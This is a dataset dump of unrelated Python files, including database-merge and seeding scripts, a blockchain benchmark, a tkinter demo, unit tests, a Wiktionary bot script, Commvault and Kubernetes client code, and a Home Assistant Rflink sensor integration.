cur.fetchall()\n\n for app in apps:\n a = App(\n title = app[1],\n bundle_id = app[2],\n url = app[3],\n developer = app[4],\n genre = app[5],\n content_rating = app[6],\n content_rating_description = app[7],\n contains_ads = app[8],\n installs = app[9],\n privacy_policy = app[10]\n )\n session.add(a)\n session.commit()\n session.refresh(a)\n\n cur = conn.cursor()\n cur.execute(f\"SELECT * FROM reviews where app_id={a.id}\")\n reviews = cur.fetchall()\n for r in reviews:\n r = Review(\n app_id = a.id,\n content = r[2],\n review_native_id = r[3],\n created_at = parse(r[4]),\n score = r[5],\n reply_content = r[6]\n )\n session.add(r)\n session.commit()\n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM bundle_ids\")\n bundles = cur.fetchall()\n\n for b in bundles:\n b_id = BundleId(native_id=b[1])\n session.add(b_id)\n session.commit()\n\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM bundle_ids\")\n bundles = cur.fetchall()\n\nif __name__ == '__main__':\n session = init()\n conn = create_connection('reviews.db')\n select_all(conn, session)\n\n conn = create_connection('pof_reviews.db')\n select_all(conn, 
session)\n","sub_path":"combine_dbs.py","file_name":"combine_dbs.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"2605221","text":"import psycopg2\n\nfrom db_connector import DBManipulator\nimport random\nimport uuid\n\nfrom psycopg2.extras import execute_batch\n\nfrom mimesis.enums import Gender\nfrom mimesis import Generic\nfrom mimesis import Datetime\n\ng = Generic('en')\nd = Datetime('en')\n\nusers_count = 500000//20\ncategories_count = 5000//20\nmessages_count = 10000000//20\n\n\n# users_count = 5\n# categories_count = 10\n# messages_count = 10\n\n\ndef create_users(count):\n result = [{'id': create_uuid(), 'name': g.person.full_name(gender=Gender.FEMALE)} for i in range(count)]\n return result\n\n\ndef create_categories(count):\n result = [{'id': create_uuid(), 'name': g.text.title(), 'parent_id': create_uuid()} for i in range(count)]\n return result\n\n\ndef create_messages(count, users, categories):\n result = [{'id': create_uuid(),\n 'text': g.text.text(quantity=1),\n 'category_id': categories[random.randint(0, len(categories) - 1)].get('id'),\n 'posted_at': d.datetime(2000, 2020),\n 'author_id': users[random.randint(0, len(users)) - 1].get('id')}\n for i in range(count)]\n return result\n\n\ndef create_uuid():\n return str(uuid.uuid1())\n\n\nif __name__ == '__main__':\n db_con = DBManipulator('db.ini')\n db_con.connect()\n\n clean_start = True\n\n if clean_start:\n db_con.drop_all_users()\n db_con.drop_all_categories()\n db_con.drop_all_messages()\n\n users = create_users(users_count)\n categories = create_categories(categories_count)\n messages = create_messages(messages_count, users, categories)\n\n # print(db_con.get_tables())\n # db_con.cursor.execute(\"SELECT * from public.users\")\n # print(db_con.cursor.fetchall())\n\n print('DEBUG: inserting users...')\n db_con.cursor.execute(\"PREPARE insert_users (uuid, text) AS INSERT INTO users VALUES($1, $2);\")\n execute_batch(db_con.cursor, \"EXECUTE insert_users (%(id)s, %(name)s)\", users)\n db_con.connection.commit()\n print('DEBUG: inserting users successful.')\n\n print('DEBUG: inserting categories...')\n db_con.cursor.execute(\"PREPARE insert_categories (uuid, text, uuid) AS INSERT INTO categories VALUES($1, $2, $3);\")\n execute_batch(db_con.cursor, \"EXECUTE insert_categories (%(id)s, %(name)s, %(parent_id)s)\", categories)\n db_con.connection.commit()\n print('DEBUG: inserting categories successful.')\n\n print('DEBUG: inserting messages...')\n db_con.cursor.execute(\n \"PREPARE mes (uuid, text, uuid, time, uuid) AS INSERT INTO messages VALUES($1, $2, $3, $4, $5);\")\n execute_batch(db_con.cursor, \"\"\"EXECUTE mes (%(id)s, %(text)s, %(category_id)s,\n %(posted_at)s, %(author_id)s)\"\"\", messages)\n db_con.connection.commit()\n print('DEBUG: inserting messages...')\n db_con.disconnect()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466008377","text":"import argparse\nimport logging\nimport os\nimport time\nimport sys\nfrom tqdm import tqdm\n\nfrom chains.binance import MockBinance\nfrom thorchain.thorchain import ThorchainState, ThorchainClient\nfrom utils.common import Transaction, Coin, get_rune_asset\nfrom chains.aliases import get_alias\n\n# Init logging\nlogging.basicConfig(\n format=\"%(asctime)s | %(levelname).4s | %(message)s\",\n level=os.environ.get(\"LOGLEVEL\", 
\"INFO\"),\n)\n\nRUNE = get_rune_asset()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--binance\", default=\"http://localhost:26660\", help=\"Mock binance server\"\n )\n parser.add_argument(\n \"--thorchain\", default=\"http://localhost:1317\", help=\"Thorchain API url\"\n )\n parser.add_argument(\n \"--thorchain-websocket\",\n default=\"ws://localhost:26657/websocket\",\n help=\"Thorchain Websocket url\",\n )\n parser.add_argument(\n \"--tx-type\", default=\"swap\", help=\"Transactions type to perform (swap or stake)\"\n )\n parser.add_argument(\n \"--num\", type=int, default=100, help=\"Number of transactions to perform\"\n )\n args = parser.parse_args()\n\n benchie = Benchie(\n args.binance, args.thorchain, args.tx_type, args.num, args.thorchain_websocket\n )\n try:\n benchie.run()\n except Exception as e:\n logging.fatal(e)\n sys.exit(1)\n\n\nclass Benchie:\n def __init__(self, bnb, thor, tx_type, num, thor_ws=None):\n self.thorchain = ThorchainState()\n\n self.thorchain_client = ThorchainClient(thor, thor_ws)\n vault_address = self.thorchain_client.get_vault_address(\"BNB\")\n vault_pubkey = self.thorchain_client.get_vault_pubkey()\n\n self.thorchain.set_vault_pubkey(vault_pubkey)\n\n self.mock_binance = MockBinance(bnb)\n self.mock_binance.set_vault_address(vault_address)\n\n self.num = num\n self.tx_type = tx_type\n if self.tx_type != \"swap\" and self.tx_type != \"stake\":\n logging.error(\"invalid tx type: \" + self.tx_type)\n os.exit(1)\n\n time.sleep(5) # give thorchain extra time to start the blockchain\n\n def error(self, err):\n self.exit = 1\n if self.fast_fail:\n raise Exception(err)\n else:\n logging.error(err)\n\n def run(self):\n logging.info(f\">>> Starting benchmark... ({self.tx_type}: {self.num})\")\n logging.info(\">>> setting up...\")\n # seed staker\n self.mock_binance.transfer(\n Transaction(\n \"BNB\",\n get_alias(\"BNB\", \"MASTER\"),\n get_alias(\"BNB\", \"STAKER-1\"),\n [\n Coin(\"BNB.BNB\", self.num * 100 * Coin.ONE),\n Coin(RUNE, self.num * 100 * Coin.ONE),\n ],\n )\n )\n\n # seed swapper\n self.mock_binance.transfer(\n Transaction(\n \"BNB\",\n get_alias(\"BNB\", \"MASTER\"),\n get_alias(\"BNB\", \"USER-1\"),\n [\n Coin(\"BNB.BNB\", self.num * 100 * Coin.ONE),\n Coin(RUNE, self.num * 100 * Coin.ONE),\n ],\n )\n )\n\n if self.tx_type == \"swap\":\n # stake BNB\n self.mock_binance.transfer(\n Transaction(\n \"BNB\",\n get_alias(\"BNB\", \"STAKER-1\"),\n get_alias(\"BNB\", \"VAULT\"),\n [\n Coin(\"BNB.BNB\", self.num * 100 * Coin.ONE),\n Coin(RUNE, self.num * 100 * Coin.ONE),\n ],\n memo=\"STAKE:BNB.BNB\",\n )\n )\n\n time.sleep(5) # give thorchain extra time to start the blockchain\n\n logging.info(\"<<< done.\")\n logging.info(\">>> compiling transactions...\")\n txns = []\n memo = f\"{self.tx_type}:BNB.BNB\"\n for x in range(0, self.num):\n if self.tx_type == \"stake\":\n coins = [\n Coin(RUNE, 10 * Coin.ONE),\n Coin(\"BNB.BNB\", 10 * Coin.ONE),\n ]\n elif self.tx_type == \"swap\":\n coins = [\n Coin(RUNE, 10 * Coin.ONE),\n ]\n txns.append(\n Transaction(\n \"BNB\",\n get_alias(\"BNB\", \"USER-1\"),\n get_alias(\"BNB\", \"VAULT\"),\n coins,\n memo=memo,\n )\n )\n\n logging.info(\"<<< done.\")\n logging.info(\">>> broadcasting transactions...\")\n self.mock_binance.transfer(txns)\n logging.info(\"<<< done.\")\n\n logging.info(\">>> timing for thorchain...\")\n start_block_height = self.thorchain_client.get_block_height()\n t1 = time.time()\n completed = 0\n\n pbar = tqdm(total=self.num)\n while completed < self.num:\n 
events = self.thorchain_client.events\n if len(events) == 0:\n time.sleep(1)\n continue\n completed = len([e for e in events if e.type == self.tx_type.lower()])\n pbar.update(completed)\n time.sleep(1)\n pbar.close()\n\n t2 = time.time()\n end_block_height = self.thorchain_client.get_block_height()\n total_time = t2 - t1\n total_blocks = end_block_height - start_block_height\n logging.info(\"<<< done.\")\n logging.info(f\"({self.tx_type}: {completed}\")\n logging.info(f\"Blocks: {total_blocks}, {total_time} seconds)\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":5626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158147315","text":"from tkinter import *\n\n\nclass Aplication(Frame):\n \"\"\"GUI - приложение, владеющее секретом долголетия.\"\"\"\n def __init__(self, master):\n \"\"\"Инициализирует рамку\"\"\"\n # Конструктор надкласса.\n super(Aplication, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\"Создаёт кнопку, текстовое поле и текстовую область.\"\"\"\n # метка-инструкция\n self.inst_lbl = Label(self, text='Чтобы узнать секрет долголетия, введите пароль')\n self.inst_lbl.grid(row=0, column=0, columnspan=2, sticky=W)\n # метка около поля воода пароля\n self.pw_lbl = Label(self, text='Пароль: ')\n self.pw_lbl.grid(row=1, column=0, sticky=W)\n # текстовое поле для ввода пароля\n self.pw_ent = Entry(self)\n self.pw_ent.grid(row=1, column=1, sticky=W)\n # кнопка отправки значания\n self.submit_bttn = Button(self, text='Узнать секрет', command = self.reveal)\n self.submit_bttn.grid(row=2, column=0, sticky=W)\n # создание текстовой области, в которую будет выведен ответ\n self.secret_txt = Text(self, width=35, height=5, wrap=WORD)\n self.secret_txt.grid(row=3, column=0, columnspan=2, sticky=W)\n\n def reveal(self):\n \"\"\"В зависимости от введенного пароля отвечает разными сообщениями.\"\"\"\n contents = self.pw_ent.get() # get() возвращает текстовое содержимое элемента\n\n if contents == \"secret\":\n message = 'Чтобы дожить до 100 лет, надо сначала дожить до 99, а потом вести себя ОЧЕНЬ осторожно.'\n else:\n message = 'Вы ввели неправельный пароль, так что я не могу поделиться тайной с вами.'\n\n self.secret_txt.delete(0.0, END)\n self.secret_txt.insert(0.0, message)\n\n\n# Основная часть\ntk = Tk()\ntk.title('Долгожитель')\ntk.geometry('300x150')\n\napp = Aplication(tk)\ntk.mainloop()","sub_path":"GUI/GUI - long-liver.py","file_name":"GUI - long-liver.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339709312","text":"import unittest\nfrom unittest.mock import patch, call\nimport game\n\n\nclass TestGame(unittest.TestCase):\n\n\n @patch('game.get_secret_number', return_value=4)\n @patch('game.get_guess', side_effect=[3, 10, 4])\n @patch('builtins.print')\n def test_play_game(self, mock_print, mock_guesses, mock_secret):\n\n game.main()\n\n # Create a list of expected call objects. These will be compared to the actual calls made\n # to the mock_print method. 
\n expected_calls = [ call('too low!') , call('too high!') , call('Correct!') ]\n self.assertEqual(expected_calls, mock_print.call_args_list)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n\n","sub_path":"guessing_game/test_game.py","file_name":"test_game.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"316869405","text":"\n\nfrom xai.brain.wordbase.nouns._tusk import _TUSK\n\n#calss header\nclass _TUSKS(_TUSK, ):\n\tdef __init__(self,): \n\t\t_TUSK.__init__(self)\n\t\tself.name = \"TUSKS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"tusk\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_tusks.py","file_name":"_tusks.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"615227767","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /data/PROGETTI/saxix/django-whatsnew/whatsnew/migrations/0002_auto__add_field_whatsnew_released.py\n# Compiled at: 2014-04-02 14:28:33\nimport datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n db.add_column('whatsnew_whatsnew', 'released', self.gf('django.db.models.fields.BooleanField')(default=False), keep_default=False)\n\n def backwards(self, orm):\n db.delete_column('whatsnew_whatsnew', 'released')\n\n models = {'whatsnew.whatsnew': {'Meta': {'object_name': 'WhatsNew'}, 'content': (\n 'django.db.models.fields.TextField', [], {}), \n 'id': (\n 'django.db.models.fields.AutoField', [], {'primary_key': 'True'}), \n 'released': (\n 'django.db.models.fields.BooleanField', [], {'default': 'False'}), \n 'version': (\n 'django.db.models.fields.CharField', [], {'max_length': '30'})}}\n complete_apps = [\n 'whatsnew']","sub_path":"pycfiles/whatsnew-0.3.tar/0002_auto__add_field_whatsnew_released.py","file_name":"0002_auto__add_field_whatsnew_released.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99438675","text":"import math\nfrom networktables import NetworkTables\nclass Angles:\n def __init__(self):\n self.diagonal_FOV = 68.5 #degrees\n self.horizontal_FOV = None\n self.vertical_FOV = None\n self.combined_aspect = None #800\n self.x_aspect = 640 #Image width\n self.y_aspect = 480 #Image height\n self.focal_length = None\n self.center_x = None\n self.center_y = None\n\n self.__find_FOVs()\n\n self.target_height = 2.0955 # in meters\n self.camera_height = 0.50 # in meters\n self.camera_y_angle_offset = .61 # in radians\n #Find FOV angles\n def __find_FOVs(self):\n self.center_x = self.x_aspect/2 -.5\n self.center_y = self.y_aspect/2 -.5\n self.combined_aspect = math.hypot(self.x_aspect,self.y_aspect)\n self.horizontal_FOV = 2*(math.atan( (math.tan(math.radians(self.diagonal_FOV))/2) * (self.x_aspect/self.combined_aspect) ))\n self.vertical_FOV = 2*(math.atan( (math.tan(math.radians(self.diagonal_FOV))/2) * (self.y_aspect/self.combined_aspect) ))\n self.focal_length = self.x_aspect / (2*math.tan(self.horizontal_FOV/2))\n\n\n def x_angle(self,u):\n u_deg = math.degrees(math.atan((u-self.center_x)/self.focal_length))\n u_deg = int(u_deg*1000)/1000.0\n return u_deg\n\n def y_angle(self,v):\n v_deg = 
-1*math.degrees(math.atan((v-self.center_y)/self.focal_length))\n v_deg = int(v_deg*1000)/1000.0\n return v_deg\n\n def dist(self,v):\n v_rad = math.atan((v-self.center_y)/self.focal_length)\n dist = (self.target_height-self.camera_height)/(math.tan(v_rad-self.camera_y_angle_offset+.0000000000001)) # extra added value prevents divide by zero\n dist = int(dist*1000)/1000.0\n return dist;\n","sub_path":"conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"174372267","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport blib, re\nfrom blib import msg, errandmsg, site\nimport pywikibot\n\ndef process_page(page, index, args, contents):\n pagetitle = str(page.title())\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n def errandpagemsg(txt):\n errandmsg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n if args.verbose:\n pagemsg(\"Processing\")\n if page.exists():\n errandpagemsg(\"Page already exists, not overwriting\")\n return\n comment = 'Created page with \"%s\"' % contents\n if args.save:\n page.text = contents\n if blib.safe_page_save(page, comment, errandpagemsg):\n errandpagemsg(\"Created page, comment = %s\" % comment)\n else:\n pagemsg(\"Would create, comment = %s\" % comment)\n\nparams = blib.create_argparser(\"Create pages\", include_pagefile=True)\nparams.add_argument(\"--contents\", help=\"Contents of pages\", required=True)\nargs = params.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\ndef do_process_page(page, index):\n return process_page(page, index, args, args.contents)\nblib.do_pagefile_cats_refs(args, start, end, do_process_page)\n","sub_path":"create_pages.py","file_name":"create_pages.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56957674","text":"#!/usr/bin/env python\n\"\"\"\n SlipStream Client\n =====\n Copyright (C) 2017 SixSq Sarl (sixsq.com)\n =====\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nfrom slipstream.command.CloudClientCommand import main\nfrom slipstream.command.TerminateInstancesCommand import TerminateInstancesCommand\nfrom slipstream_kubernetes.KubernetesCommand import KubernetesCommand\nfrom slipstream.ConfigHolder import ConfigHolder\nfrom slipstream.NodeDecorator import KEY_RUN_CATEGORY\n\n\nclass KubernetesTerminateInstances(TerminateInstancesCommand, KubernetesCommand):\n\n INSTANCES_NAMESPACE = \"instance-namespace\"\n\n def _set_command_specific_options(self, parser):\n parser.add_option('--' + self.INSTANCE_IDS_KEY, dest=self.INSTANCE_IDS_KEY,\n help='Instance ID (can be used multiple times)',\n action='append', default=[], metavar='ID')\n parser.add_option('--' + self.INSTANCES_IDS_FILE_KEY, dest=self.INSTANCES_IDS_FILE_KEY,\n help='File containing a list of instance ids (one per line)',\n default=None, metavar='FILE')\n parser.add_option('--' + 
self.INSTANCES_NAMESPACE, dest=self.INSTANCES_NAMESPACE,\n help='Namespace where the instances are',\n default=[], metavar='NAMESPACE')\n\n def do_work(self):\n ids = self.get_option(self.INSTANCE_IDS_KEY)\n ch = ConfigHolder(options={'verboseLevel': self.options.verbose and 3 or 0,\n 'retry': False,\n KEY_RUN_CATEGORY: ''},\n context={'foo': 'bar'})\n cc = self.get_connector_class()(ch)\n\n # pylint: disable=protected-access\n cc._initialization(self.user_info, **self.get_initialization_extra_kwargs())\n\n fname = self.get_option(self.INSTANCES_IDS_FILE_KEY)\n if fname:\n with open(fname) as f:\n ids += f.read().splitlines()\n\n if cc.has_capability(cc.CAPABILITY_VAPP):\n cc.stop_vapps_by_ids(ids, self.get_option(self.INSTANCES_NAMESPACE))\n else:\n cc._stop_instances_in_namespace(ids, self.get_option(self.INSTANCES_NAMESPACE))\n\n def __init__(self):\n super(KubernetesTerminateInstances, self).__init__()\n\n\nif __name__ == \"__main__\":\n main(KubernetesTerminateInstances)\n","sub_path":"kubernetes/python/tar/slipstream_kubernetes/KubernetesTerminateInstancesCommand.py","file_name":"KubernetesTerminateInstancesCommand.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632497080","text":"import logging\nimport xmltodict\nfrom dicttoxml import dicttoxml\n\nfrom .base_session import BaseSession\nfrom .exceptions import raise_requests_error\n\nlog = logging.getLogger(__name__)\n\n\nclass ClientGroupSession(BaseSession):\n \"\"\"Methods for client groups.\"\"\"\n def __init__(self, cache_methods=None, *args, **kwargs):\n cache_methods = cache_methods or ['get_client_groups',\n 'get_client_group_properties',\n 'get_client_group']\n super(ClientGroupSession, self).__init__(cache_methods=cache_methods, *args, **kwargs)\n\n def get_client_groups(self):\n \"\"\"Get clients.\n\n Returns:\n list: clients\n \"\"\"\n path = 'ClientGroup'\n res = self.request('GET', path)\n data = res.json()\n if not 'groups' in data:\n groups = []\n else:\n groups = data['groups']\n return groups\n\n def get_client_group_properties(self, group_id, xml=False):\n \"\"\"Get client group properties.\n\n This call sometimes replies in XML, because who cares about\n Accept headers right. 
So, we must take the reply in XML and\n convert it to JSON to maintain sanity.\n\n Args:\n group_id (str): client group ID\n xml (boolean): If True, returns the raw XML response.\n\n Returns:\n dict: client group properties\n \"\"\"\n if isinstance(group_id, int):\n log.warning('deprecated: group_id support for int for backward compatibility only')\n group_id = str(group_id)\n path = 'ClientGroup/{}'.format(group_id)\n if xml:\n headers = {\"Accept\": \"application/xml\"}\n else:\n headers = {}\n res = self.request('GET', path, headers=headers)\n # If you are using a < v10 SP12 this call will respond in\n # xml even though we are requesting json.\n if xml:\n return res.text\n else:\n if not res.json():\n # turn wrong xml into json\n data = xmltodict.parse(res.text)\n else:\n data = res.json()\n try:\n props = data['clientGroupDetail']\n except KeyError:\n # support previous Commvault api versions\n props = data['App_PerformClientGroupResp']['clientGroupDetail']\n if not props:\n msg = 'No client properties found for client group {}'.format(client_id)\n raise_requests_error(404, msg)\n return props\n\n\n def post_client_group(self, props):\n \"\"\"Create a new client group\n\n Args:\n props (str): XML client group properties string\n\n Returns:\n dict: response\n \"\"\"\n path = 'ClientGroup'\n res = self.request('POST', path, payload_nondict=props, headers={\"Content-type\": \"application/xml\"})\n if not res.json():\n data = xmltodict.parse(res.text)\n else:\n data = res.json()\n return data['clientGroupDetail']\n\n def post_client_group_properties(self, client_group_id, props):\n \"\"\"Post client group properties.\n\n Args:\n client_group_id (str): client group id\n props (str): XML subclient properties string\n\n Returns:\n dict: response\n \"\"\"\n if isinstance(client_group_id, int):\n log.warning('deprecated: subclient_id support for int for backward compatibility only')\n client_group_id = str(client_group_id)\n path = 'ClientGroup/{}'.format(client_group_id)\n res = self.request('POST', path, payload_nondict=props, headers={\"Content-type\": \"application/xml\"})\n if not res.json():\n data = xmltodict.parse(res.text)\n else:\n data = res.json()\n return data\n","sub_path":"pinkopy/client_groups.py","file_name":"client_groups.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485913920","text":"\"\"\"Support for Rflink sensors.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any\n\nfrom rflink.parser import PACKET_FIELDS, UNITS\nimport voluptuous as vol\n\nfrom homeassistant.components.sensor import (\n PLATFORM_SCHEMA,\n SensorDeviceClass,\n SensorEntity,\n SensorEntityDescription,\n SensorStateClass,\n)\nfrom homeassistant.const import (\n CONF_DEVICES,\n CONF_NAME,\n CONF_SENSOR_TYPE,\n CONF_UNIT_OF_MEASUREMENT,\n UnitOfSpeed,\n UnitOfTemperature,\n)\nfrom homeassistant.core import HomeAssistant\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.dispatcher import async_dispatcher_connect\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\n\nfrom . 
import (\n CONF_ALIASES,\n CONF_AUTOMATIC_ADD,\n DATA_DEVICE_REGISTER,\n DATA_ENTITY_LOOKUP,\n EVENT_KEY_ID,\n EVENT_KEY_SENSOR,\n EVENT_KEY_UNIT,\n SIGNAL_AVAILABILITY,\n SIGNAL_HANDLE_EVENT,\n TMP_ENTITY,\n RflinkDevice,\n)\n\nSENSOR_ICONS = {\n \"humidity\": \"mdi:water-percent\",\n \"battery\": \"mdi:battery\",\n}\n\nSENSOR_TYPES = (\n # check new descriptors against PACKET_FIELDS & UNITS from rflink.parser\n SensorEntityDescription(\n key=\"distance\",\n name=\"Distance\",\n device_class=SensorDeviceClass.DISTANCE,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n SensorEntityDescription(\n key=\"barometric_pressure\",\n name=\"Barometric pressure\",\n device_class=SensorDeviceClass.PRESSURE,\n state_class=SensorStateClass.MEASUREMENT,\n ),\n SensorEntityDescription(\n key=\"average_windspeed\",\n name=\"Average windspeed\",\n device_class=SensorDeviceClass.WIND_SPEED,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfSpeed.KILOMETERS_PER_HOUR,\n ),\n SensorEntityDescription(\n key=\"windgusts\",\n name=\"Wind gusts\",\n device_class=SensorDeviceClass.WIND_SPEED,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfSpeed.KILOMETERS_PER_HOUR,\n ),\n SensorEntityDescription(\n key=\"windspeed\",\n name=\"Wind speed\",\n device_class=SensorDeviceClass.WIND_SPEED,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfSpeed.KILOMETERS_PER_HOUR,\n ),\n SensorEntityDescription(\n key=\"temperature\",\n name=\"Temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfTemperature.CELSIUS,\n ),\n SensorEntityDescription(\n key=\"windtemp\",\n name=\"Wind temperature\",\n device_class=SensorDeviceClass.TEMPERATURE,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfTemperature.CELSIUS,\n ),\n SensorEntityDescription(\n key=\"windchill\",\n name=\"Wind chill\",\n device_class=SensorDeviceClass.TEMPERATURE,\n state_class=SensorStateClass.MEASUREMENT,\n native_unit_of_measurement=UnitOfTemperature.CELSIUS,\n ),\n)\n\nSENSOR_TYPES_DICT = {desc.key: desc for desc in SENSOR_TYPES}\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n {\n vol.Optional(CONF_AUTOMATIC_ADD, default=True): cv.boolean,\n vol.Optional(CONF_DEVICES, default={}): {\n cv.string: vol.Schema(\n {\n vol.Optional(CONF_NAME): cv.string,\n vol.Required(CONF_SENSOR_TYPE): cv.string,\n vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,\n vol.Optional(CONF_ALIASES, default=[]): vol.All(\n cv.ensure_list, [cv.string]\n ),\n }\n )\n },\n },\n extra=vol.ALLOW_EXTRA,\n)\n\n\ndef lookup_unit_for_sensor_type(sensor_type):\n \"\"\"Get unit for sensor type.\n\n Async friendly.\n \"\"\"\n field_abbrev = {v: k for k, v in PACKET_FIELDS.items()}\n\n return UNITS.get(field_abbrev.get(sensor_type))\n\n\ndef devices_from_config(domain_config):\n \"\"\"Parse configuration and add Rflink sensor devices.\"\"\"\n devices = []\n for device_id, config in domain_config[CONF_DEVICES].items():\n device = RflinkSensor(device_id, **config)\n devices.append(device)\n\n return devices\n\n\nasync def async_setup_platform(\n hass: HomeAssistant,\n config: ConfigType,\n async_add_entities: AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None,\n) -> None:\n \"\"\"Set up the Rflink platform.\"\"\"\n async_add_entities(devices_from_config(config))\n\n async def add_new_device(event):\n \"\"\"Check if device is known, otherwise create device entity.\"\"\"\n device_id = 
event[EVENT_KEY_ID]\n\n device = RflinkSensor(\n device_id,\n event[EVENT_KEY_SENSOR],\n event[EVENT_KEY_UNIT],\n initial_event=event,\n )\n # Add device entity\n async_add_entities([device])\n\n if config[CONF_AUTOMATIC_ADD]:\n hass.data[DATA_DEVICE_REGISTER][EVENT_KEY_SENSOR] = add_new_device\n\n\nclass RflinkSensor(RflinkDevice, SensorEntity):\n \"\"\"Representation of a Rflink sensor.\"\"\"\n\n def __init__(\n self,\n device_id: str,\n sensor_type: str,\n unit_of_measurement: str | None = None,\n initial_event=None,\n **kwargs: Any,\n ) -> None:\n \"\"\"Handle sensor specific args and super init.\"\"\"\n self._sensor_type = sensor_type\n self._unit_of_measurement = unit_of_measurement\n if sensor_type in SENSOR_TYPES_DICT:\n self.entity_description = SENSOR_TYPES_DICT[sensor_type]\n elif not unit_of_measurement:\n self._unit_of_measurement = lookup_unit_for_sensor_type(sensor_type)\n\n super().__init__(device_id, initial_event=initial_event, **kwargs)\n\n def _handle_event(self, event):\n \"\"\"Domain specific event handler.\"\"\"\n self._state = event[\"value\"]\n\n async def async_added_to_hass(self) -> None:\n \"\"\"Register update callback.\"\"\"\n # Remove temporary bogus entity_id if added\n tmp_entity = TMP_ENTITY.format(self._device_id)\n if (\n tmp_entity\n in self.hass.data[DATA_ENTITY_LOOKUP][EVENT_KEY_SENSOR][self._device_id]\n ):\n self.hass.data[DATA_ENTITY_LOOKUP][EVENT_KEY_SENSOR][\n self._device_id\n ].remove(tmp_entity)\n\n # Register id and aliases\n self.hass.data[DATA_ENTITY_LOOKUP][EVENT_KEY_SENSOR][self._device_id].append(\n self.entity_id\n )\n if self._aliases:\n for _id in self._aliases:\n self.hass.data[DATA_ENTITY_LOOKUP][EVENT_KEY_SENSOR][_id].append(\n self.entity_id\n )\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass, SIGNAL_AVAILABILITY, self._availability_callback\n )\n )\n self.async_on_remove(\n async_dispatcher_connect(\n self.hass,\n SIGNAL_HANDLE_EVENT.format(self.entity_id),\n self.handle_event_callback,\n )\n )\n\n # Process the initial event now that the entity is created\n if self._initial_event:\n self.handle_event_callback(self._initial_event)\n\n @property\n def native_unit_of_measurement(self):\n \"\"\"Return measurement unit.\"\"\"\n if self._unit_of_measurement:\n return self._unit_of_measurement\n if hasattr(self, \"entity_description\"):\n return self.entity_description.native_unit_of_measurement\n return None\n\n @property\n def native_value(self):\n \"\"\"Return value.\"\"\"\n return self._state\n\n @property\n def icon(self):\n \"\"\"Return possible sensor specific icon.\"\"\"\n if self._sensor_type in SENSOR_ICONS:\n return SENSOR_ICONS[self._sensor_type]\n","sub_path":"homeassistant/components/rflink/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":8004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 